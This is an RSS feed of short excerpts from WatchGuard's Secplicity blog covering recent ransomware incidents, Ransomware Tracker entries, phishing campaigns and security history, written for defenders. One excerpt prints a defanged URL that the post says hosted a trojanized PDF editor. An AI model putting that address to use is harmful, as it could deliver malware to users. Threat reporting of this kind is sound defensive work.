<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0" xml:base="https://www.watchguard.com/">
  <channel>
    <title>Secplicity Blog</title>
    <link>https://www.watchguard.com/</link>
    <description>Secplicity provides daily video and editorial content about IT security for today’s busy professional.</description>
    <language>en</language>
    
    <item>
  <title>4 Major UK CyberAttacks and the Year Isn’t Over Yet</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/4-major-uk-cyberattacks-and-year-isnt-over-yet</link>
  <description>  &lt;p&gt;Cyberattacks have become the new normal, but 2025 has been particularly brutal for UK businesses. We’re not even through the year, and already four major incidents have shaken industries, disrupted communities, and forced us to think harder about how we deal with cyber threats. Here’s what’s happened so far and what we can learn from it. 1. KNP A 150-Year Legacy Cut Short KNP was hit by ransomware that started with a weak one-week password. That small gap in security opened the door for attackers, who were then able to lock the company’s systems for a week. The downtime was so damaging that&lt;/p&gt;


</description>
  <pubDate>Fri, 19 Sep 2025 15:12:02 -0700</pubDate>
    <dc:creator>Martin Lethbridge</dc:creator>
    <guid isPermaLink="false">5a6b5fc6-2113-409c-bcfe-f06e9f436997</guid>
    </item>
<item>
  <title>No More Ransom: The UK’s New Cybersecurity Rules Mark a Global Shift</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/no-more-ransom-uks-new-cybersecurity-rules-mark-global-shift</link>
  <description>  &lt;p&gt;The UK has taken one of the most decisive steps yet in the global fight against ransomware. Following a summer of attacks that disrupted healthcare, retail, and legal services, the government has confirmed that a targeted ban on ransom payments and a universal reporting requirement will become law. What the Policy Includes Ban on ransom payments: Public sector organisations and operators of Critical National Infrastructure (CNI) will be prohibited from paying ransoms. The NHS alone has faced over 1,300 attempted ransomware intrusions in the past 12 months, according to government data&lt;/p&gt;


</description>
  <pubDate>Thu, 18 Sep 2025 08:39:22 -0700</pubDate>
    <dc:creator>Oli Venn</dc:creator>
    <guid isPermaLink="false">49ebb262-1243-431b-8096-3239b57dcadd</guid>
    </item>
<item>
  <title>Cyberattacks Are Coming Thick and Fast – M&amp;S, Now Jaguar Land Rover… Who’s Next?</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/cyberattacks-are-coming-thick-and-fast-ms-now-jaguar-land-rover</link>
  <description>  &lt;p&gt;First it was Marks &amp;amp; Spencer. Then the Co-op and Harrods. Now the UK’s biggest carmaker, Jaguar Land Rover, has been hit by a cyber incident that has knocked out production lines and disrupted sales right at one of the busiest times of the year. It feels like these attacks are no longer isolated events. They are coming thick and fast, striking some of Britain’s most recognisable brands in quick succession. From Retail to the Factory Floor Back in April, Marks &amp;amp; Spencer was brought to its knees by a ransomware attack. Contactless payments stopped working, online orders went offline, and Click &amp;amp;&lt;/p&gt;


</description>
  <pubDate>Mon, 08 Sep 2025 11:15:48 -0700</pubDate>
    <dc:creator>Martin Lethbridge</dc:creator>
    <guid isPermaLink="false">9a1076ec-6f9e-4ef9-ab5c-a34e5d0c53a5</guid>
    </item>
<item>
  <title>Cyber Crime Campaign for AppSuite PDF Editor</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/cyber-crime-campaign-appsuite-pdf-editor-0</link>
  <description>  &lt;p&gt;WatchGuard has recently received reports of a cyber crime campaign underway where a weaponized version of a free PDF editor software “AppSuite PDF Editor” has been distributed to multiple sites for users to unknowingly download and run on their systems. WatchGuard has been made aware that the threat actor used Google advertising to promote this software for users to download. It was recently observed that the following URL was used to host the malicious file: hxxps[:]//pdfadmin[.]com/productivity/download/90153768[?]cid[=]G4FTU85NWQ9Kc6z3zN where the user would then launch a .msi file named&lt;/p&gt;


</description>
  <pubDate>Fri, 29 Aug 2025 16:00:00 -0700</pubDate>
    <dc:creator>Kristen Yang</dc:creator>
    <guid isPermaLink="false">aab88a9b-dba1-4031-95c7-bf1efdd2e221</guid>
    </item>
<item>
  <title>Why Are We Still Reusing Passwords? KNP's Collapse Is a Brutal Reminder</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/why-are-we-still-reusing-passwords-knps-collapse-brutal-reminder</link>
  <description>  &lt;p&gt;Let’s stop pretending this is new. It is 2025. We have had years, decades of advice, warnings, and horror stories about password security. And still, people are reusing passwords like it is 2005. We are not talking about random Internet users, either. We are talking about businesses, infrastructure, leadership teams, and real people making real decisions that affect livelihoods. The collapse of KNP, a 158-year-old UK transport firm, should be the final wake-up call. One reused password. One guessed login. Ransomware hit. Seven hundred people out of work. Finished. You can read it for yourself&lt;/p&gt;


</description>
  <pubDate>Thu, 24 Jul 2025 07:59:23 -0700</pubDate>
    <dc:creator>Martin Lethbridge</dc:creator>
    <guid isPermaLink="false">a2ea2b4d-737d-4284-a811-06e70274ce03</guid>
    </item>
<item>
  <title>Configuration of IT-Security solutions matter – and sometimes a single parameter can cause big trouble</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/configuration-it-security-solutions-matter-and-sometimes-single</link>
  <description>  &lt;p&gt;Sometimes supposedly small things make a huge difference. This can also be true in cyber security configurations. In recent weeks, multiple partners described very similar cyber attacks their customers faced, and in some cases, the criminals were unfortunately even successful in compromising customer networks. Specifically speaking, cyber criminals first exfiltrated and then encrypted data with Akira ransomware. Akira ransomware has already been out in the wild since March 2023 and many companies have fallen victim (CISA has published a very detailed description and also many helpful recommendations in&lt;/p&gt;


</description>
  <pubDate>Wed, 02 Jul 2025 11:32:58 -0700</pubDate>
    <dc:creator>Jonas Spieckermann</dc:creator>
    <guid isPermaLink="false">2f7f5457-1db0-4ff4-a8fd-c6b557f56bd0</guid>
    </item>
<item>
  <title>Why Many Companies Still Use WPA2 And Why It's Time to Move On</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/why-many-companies-still-use-wpa2-and-why-its-time-move-0</link>
  <description>  &lt;p&gt;In the ever-evolving world of cybersecurity, one area that often gets overlooked is Wi-Fi security. Despite major advances, a surprising number of companies still rely on WPA2 (Wi-Fi Protected Access 2) to secure their wireless networks. As of 2024, approximately 60% of companies continue to use WPA2, while only around 40% have made the shift to WPA3, the latest and more secure standard. WPA2: Still Prevalent, But Showing Its Age Introduced in 2004, WPA2 has been the gold standard for Wi-Fi security for well over a decade. When properly configured ‒ especially in its Enterprise version ‒ it&lt;/p&gt;


</description>
  <pubDate>Fri, 20 Jun 2025 04:49:54 -0700</pubDate>
    <dc:creator>Martin Lethbridge</dc:creator>
    <guid isPermaLink="false">c8e1116b-2824-46c3-85ae-2d5eaf70834a</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #258): NailaoLocker </title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-258-nailaolocker</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/nailaolocker Analysis for NailaoLocker was first unveiled by researchers from the Orange Cyberdefense CERT and Trend Micro in mid-February 2025. In addition to a technical analysis of the NailaoLocker, it also included analyses of a remote access tool (RAT) called PlugX and a modular backdoor called ShadowPad. Both of these tools have a history of preceding intrusions from Chinese-based actors. Hence, the attribution to China. Between June and October 2024, Orange Cyberdefense research revealed a campaign, dubbed Green&lt;/p&gt;


</description>
  <pubDate>Wed, 18 Jun 2025 20:16:29 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">9d603ddc-e998-44a7-81ed-b0e27a947947</guid>
    </item>
<item>
  <title>Encrypted Client Hello</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/encrypted-client-hello</link>
  <description>  &lt;p&gt;What is Encrypted Client Hello? Encrypted Client Hello (ECH) is a TLS protocol extension that encrypts the initial "Client Hello" message in the TLS handshake, concealing the domain name a user is trying to access from network observers, enhancing privacy and security. This article explains this TLS protocol extension and the impact it has on the content filtering settings on your network security devices.&lt;/p&gt;


</description>
  <pubDate>Thu, 12 Jun 2025 07:42:05 -0700</pubDate>
    <dc:creator>Brendan Patterson</dc:creator>
    <guid isPermaLink="false">70de48eb-4b6b-42ad-a8c8-9d64f4740374</guid>
    </item>
<item>
  <title>M&amp;S and Co-op Under Siege: What These Cyber Attacks Teach Us</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ms-and-co-op-under-siege-what-these-cyber-attacks-teach-us</link>
  <description>  &lt;p&gt;The past few weeks have sent ripples of concern through the UK Retail landscape as giants Marks &amp;amp; Spencer (M&amp;amp;S) and the Co-operative Group (Co-op) found themselves battling significant cyber attacks. These attacks have caused significant operational disruption, with M&amp;amp;S suspending online orders and both retailers experiencing stock availability issues. M&amp;amp;S confirmed that hackers accessed personal customer data including names, contact details, dates of birth, and online order history, but not usable payment information or passwords. Similarly, the Co-op reported that hackers accessed members'&lt;/p&gt;


</description>
  <pubDate>Wed, 14 May 2025 13:41:24 -0700</pubDate>
    <dc:creator>Oli Venn</dc:creator>
    <guid isPermaLink="false">a12c0cf8-e821-44fe-bd90-f654990045f1</guid>
    </item>
<item>
  <title>AsyncRAT Phishing Campaign Targeting Hotel Staff</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/asyncrat-phishing-campaign-targeting-hotel-staff</link>
  <description>  &lt;p&gt;At the beginning of April, WatchGuard received a report from a customer in the hospitality business describing a new phishing campaign targeting their staff. The attack starts with the threat actor opening a reservation request with the hotel, which they then cancel by email, citing a bad review for the hotel. In the cancellation email, the attackers include a link to what they claim is the bad review, but which is actually the start of a carefully crafted malware attack that leverages living-off-the-land techniques to evade detection to install the AsyncRAT remote access trojan. The link in&lt;/p&gt;


</description>
  <pubDate>Fri, 18 Apr 2025 12:45:14 -0700</pubDate>
    <dc:creator>Marc Laliberte</dc:creator>
    <guid isPermaLink="false">c51e877c-7932-4333-8643-33bb2b952146</guid>
    </item>
<item>
  <title>Code Red (2001): The Worm That Defaced Websites </title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/code-red-2001-worm-defaced-websites</link>
  <description>  &lt;p&gt;While the world was captivated by the first Harry Potter movie, cybercriminals were busy launching one of the first major web server worms. What Was Happening in the World: The 9/11 attacks in the United States profoundly shifted global security policies, increasing focus on cybersecurity and national defense. In the meantime, the United States was preparing for military action in Afghanistan in response to terrorist threats. Euro currency had been introduced in electronic form, changing the financial landscape in Europe. In sports, Brazil won the Copa América 2001, and the world was preparing&lt;/p&gt;


</description>
  <pubDate>Mon, 07 Apr 2025 13:04:12 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">689823db-bd86-4560-a071-8c41e29c712e</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #242): Yashma</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-242-yashma</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/yashma Note: This page is dedicated to the Yashma (Chaos v6.0) ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 , Chaos v2.0 , Chaos v3.0 , Chaos v4.0 , and Chaos v5.0 entries. Note: Two decryptors exist for Yashma, including the original decryptor from Truesec. See below. The Yashma builder is a fork of the Chaos v5.0 builder with very minor differences. They are: The&lt;/p&gt;


</description>
  <pubDate>Tue, 01 Apr 2025 15:45:48 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">ae02ed89-7d87-4abd-aa5f-0780c580fce1</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #241): Chaos v5.0</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-241-chaos-v50</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v50 Note: This page is dedicated to the Chaos v5.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 , Chaos v2.0 , Chaos v3.0 , and Chaos v4.0 entries. Note: A decryptor exists for Chaos v3.0 through Yashma. See below. The Chaos v5.0 builder expands on the Chaos v4.0 builder with only minor differences. They are: The encryption algorithm now allows users to encrypt&lt;/p&gt;


</description>
  <pubDate>Tue, 01 Apr 2025 15:45:47 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">62b15bb4-539e-4cd5-a091-ee2a23d018a9</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #240): Chaos v4.0</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-240-chaos-v40</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v40 Note: This page is dedicated to the Chaos v4.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 , Chaos v2.0 , and Chaos v3.0 entries. Note: A decryptor exists for Chaos v3.0 through Yashma. See below. The Chaos v4.0 builder expands on the Chaos v3.0 builder with similar functionalities. Here are the main differences: The encryption algorithm now allows users to&lt;/p&gt;


</description>
  <pubDate>Tue, 01 Apr 2025 15:45:46 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">90470de0-cec6-4b1b-b331-f2d6c82d7bc5</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #239): Chaos v3.0</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-239-chaos-v30</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v30 Note: This page is dedicated to the Chaos v3.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 and Chaos v2.0 entries. Note: A decryptor exists for Chaos v3.0 through Yashma. See below. The Chaos v3.0 builder is similar to Chaos v2.0. However, this is the first iteration of Chaos that truly encrypts files instead of only wiping them. Here are the main&lt;/p&gt;


</description>
  <pubDate>Tue, 01 Apr 2025 15:45:45 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">25ddb10d-81ac-4008-a96d-535bb3578a5c</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #238): Chaos v2.0</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-238-chaos-v20</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v20 Note: This page is dedicated to the Chaos v2.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 entry. The Chaos v2.0 builder is similar to Chaos v1.0. It still wipes all the files by overwriting them with randomly generated data. However, it differs in a few subtle ways: The builder is officially renamed Chaos Ransomware Builder instead of Ryuk.NET Ransomware&lt;/p&gt;


</description>
  <pubDate>Tue, 01 Apr 2025 15:45:44 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">cd9601c9-fd46-48c4-9bde-7ae45c02ba7d</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #237): Chaos v1.0</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-237-chaos-v10</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v10 Note: This page is dedicated to the Chaos v1.0 ransomware builder and does not reflect any encryptors created from the builder. The Chaos v1.0 builder was first seen in June 2021 when a user named ryukRans on the XSS forum advertised it for the first time using the name Ryuk.NET. They likely chose this name because of the infamous popularity of the Ryuk name that began at the time of this builder's inception. However, after analyzing this builder, and based on various researcher accounts, the encryptors produced&lt;/p&gt;


</description>
  <pubDate>Tue, 01 Apr 2025 15:45:43 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">2ba56452-92e9-4235-ac91-c587476200d4</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #234): 0mid16B </title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-234-0mid16b</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/0mid16B 0mid16B is a Singaporean national living in Thailand who was arrested in February 2025. It was not a "group," as the individual who ran the operation often claimed. He would use an alias and then change his name on forums and marketplaces to mask his identity. However, many researchers, primarily Group-IB and DataBreaches.net, knew this was the same individual based on his writing style and format of posts. Over the few years he was active, he went by Chaoscc, DESORDEN, ALTDOS, GHOSTR, 0mid16B, and CrowdStrike gave&lt;/p&gt;


</description>
  <pubDate>Sat, 29 Mar 2025 12:11:04 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">fa637cc7-0cb0-465d-8336-52368b2d319a</guid>
    </item>
<item>
  <title>ILOVEYOU (2000): When Love Was a Virus (Literally)</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/iloveyou-2000-when-love-was-virus-literally</link>
  <description>  &lt;p&gt;In 2000, the world dodged the feared Y2K bug, avoiding major technological disruptions. The dot-com bubble was still inflating, with Internet companies booming, while France celebrated its recent victory in the 1998 FIFA World Cup. As the world looked ahead to the Sydney Olympics, mobile phones became more accessible, with the Nokia 3310 and its iconic Snake game rising in popularity. Meanwhile, Britney Spears dominated the music charts with Oops!... I Did It Again, setting the tone for a rapidly evolving digital era. But that year, love was in the air... and in emails. The Attack: ILOVEYOU&lt;/p&gt;


</description>
  <pubDate>Wed, 26 Mar 2025 09:39:42 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">badb647e-a382-40b0-8a6a-66cdbe4d6378</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #231): WAGNER</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-231-wagner</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/wagner-0 WAGNER ransomware claims to be the "official virus of PMC Wagner on employment." PMC stands for Private Military Company, and Wagner is a PMC backed by the Russian government. They are more commonly referred to as the Wagner Group. On February 24, 2022, Russia invaded Ukraine, and Russia's president, Vladimir Putin, called it a special military operation (SMO). In addition to Russian military forces, the Wagner Group was intertwined in this invasion. Several months after Ukraine defiantly thwarted the invasion to a&lt;/p&gt;


</description>
  <pubDate>Wed, 19 Mar 2025 08:30:10 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">cf740845-3217-4e5b-8e25-871638a56a7c</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #229): Hakuna Matata 1.7</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-229-hakuna-matata-17</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/hakuna-matata Hakuna Matata is a Swahili phrase meaning "there are no worries" (Hakuna = there are no; Matata = worries). It's popularized by the Disney movie The Lion King, performed by Timon and Pumbaa. However, native speakers of Swahili in countries such as Tanzania, Kenya, Uganda, and other neighboring countries seldom use this phrase in everyday conversation. It's more or less reserved for tourists because of The Lion King. In this context, Hakuna Matata is a ransomware builder that produces encryptors with AES-256&lt;/p&gt;


</description>
  <pubDate>Thu, 13 Mar 2025 15:55:41 -0700</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">858852b6-cbee-4e63-bb1b-cd880ca96d8e</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #226): Bagli</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-226-bagli</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/bagli Bagli is commonly called Bagli Wiper because it doesn't actually encrypt files; it overrides the file's bytes with the Random() function (.NET). Therefore, it's technically not ransomware; it's pseudo-ransomware as a wiper. Although a ransom note—oxu.txt—is dropped that demands a ransom of $350 in Bitcoin, there is no possible way to recover files. The ransom note is in Azerbaijani, and the wiper's creator, ryukRans, spoke primarily Russian on XSS.is (a hacking forum). Therefore, we denoted the user as Azerbaijani&lt;/p&gt;


</description>
  <pubDate>Sat, 08 Mar 2025 15:36:51 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">46650667-7f03-40d0-84dc-f29c48d718f6</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #222): Mike Tyson</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-222-mike-tyson</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/mike-tyson Mike Tyson ransomware, dubbed "Tyson" for short, is a variant of the Chaos ransomware family and obviously refers to the boxer Mike Tyson. Derivatives of Chaos are created using the Chaos Ransomware builders, of which there are six primary versions (including Yashma, traditionally referred to as version 6). This variant is believed to be from Chaos 5.0, specifically Chaos 5.2. The determination for this is that it can change the desktop wallpaper, which is applicable for only version 4.0 and beyond, and it&lt;/p&gt;


</description>
  <pubDate>Wed, 05 Mar 2025 20:11:44 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">d1c9bc74-83a5-48df-9569-4df121fe0f08</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #216): AzzaSec</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-216-azzasec</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/azzasec AzzaSec (AzzaSecurity) is both the name of the ransomware and of an Italian hacktivist group. That is based on research from Threatmon, which wrote an extensive report on this ransomware and its members. The other two members are Turkish (WalterBishop_AzzaSec) and Brazilian (DmitryRansom). However, the leader—madoneputain/Friendied—is Italian. The group was first observed in late February 2024 and disbanded in August of the same year. During this time, they created ransomware with the same name as their group, but&lt;/p&gt;


</description>
  <pubDate>Sun, 23 Feb 2025 18:17:39 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">bf99375c-fb86-405c-b705-e6bcf57067ec</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #215): Anonymous</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-215-anonymous</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/anonymous Anonymous ransomware is built from the NoCry ransomware builder, based on the infamous WannaCry ransomware. This is evident from the debug string in the discovered sample (C:\Users\Anonymous\Desktop\NoCry Builder + Source Code + Exploit Jpeg\Anonymous Encrypter SCR\ransomeware\obj\Debug\Anonymous.pdb). This ransomware shares similarities with others, such as BlackSkull, GhosHacker, and AzzaSec. There's a direct correlation to AzzaSec in the metadata of that ransomware, suggesting that this is an early iteration of&lt;/p&gt;


</description>
  <pubDate>Sun, 23 Feb 2025 18:17:38 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">e7e34fd8-de56-493e-a196-cc21ec1376b8</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #214): GhosHacker</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-214-ghoshacker</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/ghoshacker GhosHacker, which is seemingly a misspelling of GhostHacker based on the ransom note dropped with the same name—GhostHacker.exe—is a crypto-ransomware built from the NoCry ransomware builder. This allegation comes from the debug string of another similar variant named Anonymous, which shares all of the same characteristics as this ransomware and others such as BlackSkull and AzzaSec. These variants are almost the same, indicating they are all based on NoCry. It appears they all are possibly from the same threat&lt;/p&gt;


</description>
  <pubDate>Sun, 23 Feb 2025 18:17:35 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">67294f9e-61bb-4d14-b08f-3f1064ac24f2</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #213): BlackSkull</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-213-blackskull</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/blackskull BlackSkull is a near clone of GhosHacker and Anonymous and is theorized to be an early version of AzzaSec. All four of these are created from the NoCry ransomware builder, based on the infamous WannaCry ransomware. However, this ransomware poses nowhere near the threat of WannaCry. In fact, there's almost no threat to individuals or victims, considering there's only one known sample in the wild and, as was stated, was likely an earlier version of another ransomware; it's a test ransomware. When executing this&lt;/p&gt;


</description>
  <pubDate>Sun, 23 Feb 2025 18:17:33 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">b4079b04-a1f2-4909-b301-571899ab0c66</guid>
    </item>
<item>
  <title>Ransomware Tracker (Entry #210): CyberVolk</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/ransomware-tracker-entry-210-cybervolk</link>
  <description>  &lt;p&gt;Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/cybervolk CyberVolk is a self-proclaimed hacktivist group with various allegiances to other hacktivist groups throughout the globe, including Anonymous (their subsidiaries), White_Hunters, Cyber Hunters, and others. They even state they work with a DDoS service called SRV to carry out many of their extortion attacks. The group's members (many of which are listed below) carry out data breaches, website defacing, DDoS attacks, and, of course, ransomware. Before they employed ransomware in their arsenal, they were known by&lt;/p&gt;


</description>
  <pubDate>Thu, 20 Feb 2025 16:29:31 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">69d73938-6a3a-481a-9eea-1d81b24966c3</guid>
    </item>
<item>
  <title>Dr Joseph L Popp Jr and The First-Ever Ransomware – The AIDS Trojan</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/dr-joseph-l-popp-jr-and-first-ever-ransomware-aids-trojan</link>
  <description>  &lt;p&gt;Publication: Dr. Joseph L Popp Jr and The First-Ever Ransomware – The AIDS Trojan If you work in information security or the computer science field, there's a good chance you've heard of the first-ever ransomware – the AIDS Trojan. There's also a chance you know the basics of that story. An evolutionary biologist named Joseph Popp created it in 1989 and sent thousands of 5.25-inch floppy diskettes to AIDS researchers and magazine subscribers. The ransomware instructed victims to pay $178 or $379 to a Panamanian PO Box. He acted bizarrely before his arrest and was released back to the United&lt;/p&gt;


</description>
  <pubDate>Tue, 18 Feb 2025 11:58:00 -0800</pubDate>
    <dc:creator>Ryan Estes</dc:creator>
    <guid isPermaLink="false">58e442f0-4d4d-4ec3-85a4-8d4c8a82eec4</guid>
    </item>
<item>
  <title>Yet Another TA558 Campaign Targets South America’s Hospitality Industry With AsyncRAT</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/yet-another-ta558-campaign-targets-south-americas-hospitality</link>
  <description>  &lt;p&gt;Introduction This research began with finding a simple malware sample to extract strings for an unrelated topic. In my day-to-day malware analysis workflow, I stumbled upon a JavaScript (JS) file with what I would call trivial obfuscation. I knew it was malware but wanted to understand the infection chain. After some cleanup, I understood it to be a downloader of an additional malicious script. This time, a PowerShell script obscured to look like a PDF hosted on what appeared to be a compromised or hijacked domain. This PDF dropped two files, one being a helper DLL and the other being AsyncRAT&lt;/p&gt;


</description>
  <pubDate>Mon, 17 Jun 2024 13:39:28 -0700</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">e29fc5ed-4ba3-45a4-93a8-afac8e5f701a</guid>
    </item>
<item>
  <title>Operation Cronos: A Breakdown of the LockBit Disruption</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/operation-cronos-breakdown-lockbit-disruption</link>
  <description>  &lt;p&gt;Check out LockBit 3.0 on our new Ransomware Tracker Beta! Hear more about Operation Cronos on The 443 Podcast. If you've followed the ransomware space for the past few years, it's very likely you've heard of LockBit. If you don't follow the cybersecurity landscape, there's still a good chance you've heard of them or at least their operations. The group's affiliates have been in headline after headline after headline after headline. In the past few months alone, affiliates have breached ICBC, exfiltrated data from Boeing, and demanded the third largest ransom ever, $80 million, from CDW. To&lt;/p&gt;


</description>
  <pubDate>Mon, 26 Feb 2024 08:57:21 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">954a4882-1178-4a87-abf2-8406dc58f48e</guid>
    </item>
<item>
  <title>AnyDesk Remote Access Vendor Compromise</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/anydesk-remote-access-vendor-compromise</link>
  <description>  &lt;p&gt;On February 2nd, remote access software vendor AnyDesk disclosed they had been the victim of a cyberattack where an unknown threat actor obtained access to production systems. AnyDesk appears to have contained the incident before the adversaries were able to leverage their access into a supply chain attack against AnyDesk customers but out of an abundance of caution, they proactively revoked all security-related certificates including their code signing certificates for the AnyDesk application. AnyDesk also forced a password reset for all customers on their my.anydesk.com management portal as&lt;/p&gt;


</description>
  <pubDate>Mon, 12 Feb 2024 07:17:49 -0800</pubDate>
    <dc:creator>The Editor</dc:creator>
    <guid isPermaLink="false">b7120465-17eb-4189-950f-eb29d5eaaa0a</guid>
    </item>
<item>
  <title>Scratching the Surface of Rhysida Ransomware</title>
  <link>https://www.watchguard.com/wgrd-security-hub/secplicity-blog/scratching-surface-rhysida-ransomware</link>
